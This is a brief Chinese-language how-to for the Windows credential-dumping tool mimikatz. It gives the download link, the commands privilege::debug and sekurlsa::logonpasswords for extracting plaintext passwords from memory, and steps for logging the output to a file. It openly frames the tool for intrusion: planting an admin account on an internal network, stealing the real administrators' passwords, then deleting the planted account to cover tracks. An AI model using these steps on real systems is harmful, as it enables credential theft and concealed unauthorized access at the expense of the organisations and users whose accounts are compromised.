下载地址:https://github.com/gentilkiwi/mimikatz/releases

功能:抓取windows下内存中的明文密码

简单介绍:windows下抓取密码神器之mimikatz,使用该工具可以抓取内存中的明文密码,包括登录其他域的密码,访问某些×××的密码等!该工具主要在内网中进行使用,先通过添加管理账号登录到系统中,然后使用该工具抓取原系统中的管理员账号密码,从而删除自己创建的账号!

基本使用:

第一条:

privilege::debug

第二条:

sekurlsa::logonpasswords


    如果密码过多,导致在dos窗口显示不全,那么我们可以先开启日志记录功能,然后再使用上述密码进行密码抓取,最后在目录中访问mimikatz.log这个日志文件,即可查看你所有操作及其返回值!

使用:

mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz #